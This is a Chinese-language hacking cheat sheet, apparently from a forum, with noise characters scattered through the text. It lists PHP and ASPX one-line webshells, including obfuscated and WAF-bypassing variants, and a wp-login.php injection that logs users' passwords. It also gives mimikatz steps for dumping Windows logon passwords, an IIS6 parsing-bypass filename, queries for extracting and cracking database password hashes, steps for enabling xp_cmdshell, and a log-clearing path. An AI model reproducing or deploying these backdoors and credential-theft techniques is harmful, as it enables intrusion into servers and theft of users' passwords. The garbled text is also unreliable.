5 L9 S7 Y& F* Z+ i' |//危险的include函数,直接编译任何文件为php格式运行 Q- a0 V. B W, y , M& }2 P- s5 ]8 V3、) q _; j# U5 ~$ Z; O+ ?
0 a, N6 Q6 x3 a1 @( v, f! Q$reg="c"."o"."p"."y"; # h5 m4 M3 S9 W) O ' X' E, c( w6 E7 P! X+ O. ]7 O$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);5 U- I4 ]# x5 E* ~: M* d6 m& f
8 y% t. i7 C% @$ z* g//重命名任何文件 ( U' R \* C+ Z: {. N9 N . f6 b) M3 T. O6 U+ M7 f" |7 @ \+ o4、, L4 e1 k8 r2 _1 X
" v# J: _- Z/ t) F
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; U0 |& O2 ]4 P: o' Q8 w/ F& ~
, i+ E9 e# J3 F& K* J$ [$gzid("/[discuz]/e",$_POST['h'],"Access");" R" v$ k% P+ y, O
2 `. }5 D7 V, m4 W( f/ _" ~
//菜刀一句话 3 b# L3 D, c6 Q7 l$ O/ B 8 H2 O; K8 E$ ~7 N+ [5、include ($uid);8 c$ K0 d( [3 a) D9 ^2 p: C
/ W5 Z; ~6 d. z2 b; b# C2 f
//危险的include函数,直接编译任何文件为php格式运行,POST 0 d0 z1 Y* r( _8 `% C
& B' s: L' u# Y3 ?( a
T: o: Z& k' H$ G$ {7 X$ `( [
//gif插一句话 7 \6 K! C4 N# p% D8 C* b9 c. l9 D" v
6、典型一句话 ( P8 V- t1 q9 ^, C' \( W $ n5 i, o0 w. ?: i$ P程序后门代码9 K8 g( m J+ K( s
<?php eval_r($_POST[sb])?>- g" Z- H0 M& ?+ j. L; r) Z. p
程序代码 * R6 p9 ~" D7 I+ a( t& s<?php @eval_r($_POST[sb])?>9 B& m' s6 U4 X: o l
//容错代码2 B! z. O7 L1 P- {% ~9 w9 j
程序代码( s# W! {. E: l7 c& U" p! a
<?php assert($_POST[sb]);?>9 j% K9 g0 u( E1 W8 C
//使用lanker一句话客户端的专家模式执行相关的php语句1 [# Y; C! G' y D- X; L f
程序代码 3 y |2 O4 Z2 {+ I/ X7 P<?$_POST['sa']($_POST['sb']);?># Q0 s; F* V c8 p" d
程序代码 5 ?6 a2 e; r+ o# r: d2 i<?$_POST['sa']($_POST['sb'],$_POST['sc'])?> 6 k7 O$ A `' ^) X S程序代码' s/ n( i/ \' Q' T9 n" e- {
<?php + g, T) W8 ^! ?( A& e@preg_replace("/[email]/e",$_POST['h'],"error");9 _7 K3 \# |) Q
?>4 w O8 t: C" s; E
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 3 ]! b. f1 @) r8 K6 T* |( ^程序代码5 `- m; o4 T9 k+ h0 m5 C
<O>h=@eval_r($_POST[c]);</O>. X! O% {1 Z4 R
程序代码 " ?, j9 J2 a2 a/ B<script language="php">@eval_r($_POST[sb])</script>* t/ r8 X O; r1 A p& W
//绕过<?限制的一句话: R) ^7 o* y" }# i/ A- O/ p
; V }1 d+ [! q* H* v/ J( e http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip |. v7 g% v7 _1 y
详细用法: W% L; z0 _! c3 V; S
1、到tools目录。psexec \\127.0.0.1 cmd5 b2 p ]# [. B4 b4 h! l" }5 g
2、执行mimikatz ' [2 I& E( D& D, z* D- u6 j3 }3、执行 privilege::debug 1 z; m2 U9 w4 V5 H4、执行 inject::process lsass.exe sekurlsa.dll) u3 p% H1 X/ ]9 t; f" Y6 A
5、执行@getLogonPasswords " Z! P) Q9 @$ V) R. _6、widget就是密码 " J) o% Y3 b) D& z2 @$ b( N# k7、exit退出,不要直接关闭否则系统会崩溃。- X! p' ]) H/ d4 v- m' V F
5 p/ I' j4 J9 hhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面 % k. I" N8 E1 N2 c/ X& K/ x5 }1 |* N; O% I
自动查找系统高危补丁6 ^; S: o- {3 O' {) q
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt 4 V+ ~& q+ E. W( ]$ k# m* s9 m q$ f! y2 ] F9 a# W0 G# \
突破安全狗的一句话aspx后门 j$ E& \3 ^ r. N$ R<%@ Page Language="C#" ValidateRequest="false" %>* k; W" B O3 S# A9 B- m
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>8 K; n+ ?/ V6 ~3 [8 p; B
webshell下记录WordPress登陆密码 ; ?7 D7 \( D% Swebshell下记录Wordpress登陆密码方便进一步社工 9 C! d R; i3 P3 D" [在文件wp-login.php中539行处添加: , K& t4 |" ^ W$ n// log password . o1 w7 [3 V1 `' t% h$log_user=$_POST['log'];+ d& ?; j( M1 ~5 M( c; j, K4 s
$log_pwd=$_POST['pwd']; 2 a; G+ J$ K6 U) g( p$log_ip=$_SERVER["REMOTE_ADDR"]; - r* ?; B; F% r; r. x: _$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;2 z: ^' p2 I3 o2 e2 ?
$txt=$txt.”\r\n”; 8 I7 A9 S q) c& _) G, i Rif($log_user&&$log_pwd&&$log_ip){% j" i: k& R3 q& [# A
@fwrite(fopen(‘pwd.txt’,”a+”),$txt); . x6 C: ^0 F5 I0 ]* C1 n a+ \: {} # |" C, ?! j( u: M; u. m' R! w* n9 W当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。 . |0 Y$ }, ^! P0 q Y- V; _7 b$ c1 u就是搜索case ‘login’9 S3 A- R0 G! H
在它下面直接插入即可,记录的密码生成在pwd.txt中, / H% b4 M9 V- g _其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录8 a; y& l% n9 E. L4 P! m" X
利用II6文件解析漏洞绕过安全狗代码:+ }3 L* I* g, A# x
;antian365.asp;antian365.jpg ) e: ]1 O2 X4 |: O' l7 j8 B {8 a% T; E/ i
各种类型数据库抓HASH破解最高权限密码! . `! @ H# l" _& \9 T) `1.sql server2000 7 K7 q+ _# p: D) G7 I/ gSELECT password from master.dbo.sysxlogins where name='sa' n; G% c6 T5 Q" i* y0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 9 d- F. w) a# b/ F' L. m& B. z- p2FD54D6119FFF04129A1D72E7C3194F7284A7F3A 1 S+ ?+ J w9 R3 ~ ; F) l6 J1 q/ T. o: ~$ q0×0100- constant header) U$ b. r7 s$ P4 s$ i9 v
34767D5C- salt# I1 P' j' u) N" v) f; j7 \
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash / J, ]4 L& w4 Q2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash . ]/ Y" P0 u0 s/ j j' w8 mcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash 4 h3 o2 Y! F& Z2 N3 a$ E0 fSQL server 2005:- + K& y% f0 `& l% Q# @7 `3 Q9 BSELECT password_hash FROM sys.sql_logins where name='sa' , z5 q! k# i, v0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F - C2 w& ?) ^: p" i4 E( {) s0×0100- constant header4 l; c$ H7 \, D, p5 |8 U
993BF231-salt C0 F+ `2 C2 T* w# ^& B
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash 5 E! P% ^: y! W* Q- e: Fcrack case sensitive hash in cain, try brute force and dictionary based attacks./ w! j& B8 A j0 E n
# r2 {3 a2 [( L# hupdate:- following bernardo’s comments:- ) X7 t, o' _% n& [use function fn_varbintohexstr() to cast password in a hex string. . P, m) N8 G' U' n U1 Ve.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins6 n" _ n% j7 P7 z0 X: r. L' O# k
: i8 P. ]/ A# R5 ^* u. D- zMYSQL:- , R( g0 w( E9 v6 I R 7 v7 L! Q7 T6 h+ {, Y4 N2 R7 V/ d* tIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.0 [% D2 e( l2 l. }
; r: C9 U' Q! j! n3 ?2 g- X: r; [*mysql < 4.1 7 G' X3 ^1 y; M' B* e3 K9 {5 Q4 h' T
mysql> SELECT PASSWORD(‘mypass’); 8 z, E- H/ O$ k/ y" C5 l& w* H4 w+——————–+ 1 S7 \3 Y) W+ e/ ?& l9 f| PASSWORD(‘mypass’) | 9 D) ~9 M, ?5 a. F7 I) L+——————–+$ o# r6 a% K& a& D* I" @+ d
| 6f8c114b58f2ce9e | , X" P7 b: u/ H* G; Z+——————–+* x3 c# {2 L" ^( R
0 P2 \1 y, M; V& k" b) _2 x% c" R
*mysql >=4.1* M6 d5 A6 U, r
3 m4 P J& E3 s! T# r, a0 R+ F
mysql> SELECT PASSWORD(‘mypass’);; V" U" {1 y0 Z' i1 f8 U1 e0 u
+——————————————-+ G$ U+ _5 d2 ]' n. Q: Z$ e, l
| PASSWORD(‘mypass’) | I2 e4 N& ?8 f. X7 g& u2 e; \+——————————————-+6 [$ u: J/ k/ `" O! |
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |, m1 a* w( q/ p# A, q. B& l
+——————————————-+ : H' _7 ?7 Y" G2 _' B, C + T4 U2 x/ j5 z; i8 t* ]; K" jSelect user, password from mysql.user" z2 I5 _) f2 y* o4 l) {% a/ h
The hashes can be cracked in ‘cain and abel’ $ t* y' F7 {5 a! b, g. `8 R% D & d* A* b. L2 w3 h- }2 XPostgres:-- R8 R6 H" H" @) Z1 _0 ]
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)) _: I0 j* u6 g; ]6 O9 `
select usename, passwd from pg_shadow; ' p- v( m- P/ _( v+ f. T" |: U* Iusename | passwd % v4 i. W) ^4 W. \" b" i——————+————————————-: t" b T5 ?5 Y; @% R4 u
testuser | md5fabb6d7172aadfda4753bf0507ed4396/ Y; n% q$ u8 Z. B0 `- b# L, S3 v
use mdcrack to crack these hashes:-* f' p+ ~7 ]3 [' B9 e, a+ K9 w
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396& C% T0 B/ c' n8 O! x* ]# O" j
* }! q6 {/ x& uOracle:-" w& g0 M' c1 ]3 ?; y8 ~
select name, password, spare4 from sys.user$ ! e% A* O* {( x$ _# bhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g4 i, M" \' B% f, y3 ?! m
More on Oracle later, i am a bit bored…. / d( a+ Y0 ^ R! e# \" ^4 {7 D4 l
, S% T- W/ Q2 h' p( M& b在sql server2005/2008中开启xp_cmdshell z6 Q6 i8 M) i2 C( R
-- To allow advanced options to be changed.8 w& q7 V P" N4 z0 j4 p
EXEC sp_configure 'show advanced options', 1 ' O; u G9 w; L% ^! V, b# XGO) d+ }- ^/ z2 d5 y8 p0 e
-- To update the currently configured value for advanced options. 6 a6 C6 H: {- j1 BRECONFIGURE + @/ a: I) Q3 h' N" k2 W5 t% C: g, Z& ]/ |GO z$ h5 { p' a8 l0 C-- To enable the feature. 0 r9 c D0 |3 p& V' W% mEXEC sp_configure 'xp_cmdshell', 1 6 S5 \2 x" ^3 cGO% m- m `2 e2 O2 Z' j
-- To update the currently configured value for this feature. ; j0 ?1 Y) m* ^, B+ Q5 l `, ORECONFIGURE ( b- Y/ ?( [% K% e2 ?GO ' R* M' z* O- S1 a0 C0 ]SQL 2008 server日志清除,在清楚前一定要备份。 ' J5 }0 X- g: F& k( `. V/ @如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除: 6 j1 J7 C1 H1 v; F0 zX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin+ K0 X k) o6 `